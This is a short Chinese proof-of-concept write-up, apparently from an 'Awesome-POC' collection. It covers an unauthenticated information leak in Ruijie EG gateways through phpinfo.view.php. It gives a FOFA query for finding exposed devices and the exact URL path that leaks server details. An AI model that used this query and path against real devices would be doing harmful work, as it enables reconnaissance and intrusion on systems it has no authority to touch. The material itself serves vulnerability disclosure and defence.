Awesome-POC/network-device/锐捷 EG易网关 phpinfo.view.php 信息泄露漏洞.md

33 lines
550 B
Markdown
Raw Normal View History

2022-02-20 16:14:31 +08:00
# 锐捷 EG易网关 phpinfo.view.php 信息泄露漏洞
## 漏洞描述
锐捷EG易网关 部分版本 phpinfo.view.php文件权限设定存在问题导致未经身份验证获取敏感信息
## 漏洞影响
```
锐捷EG易网关
```
## FOFA
```
app="Ruijie-EG易网关"
```
## 漏洞复现
查看源码发现phpinfo文件
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110927256.png)
访问 url
```plain
/tool/view/phpinfo.view.php
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110927015.png)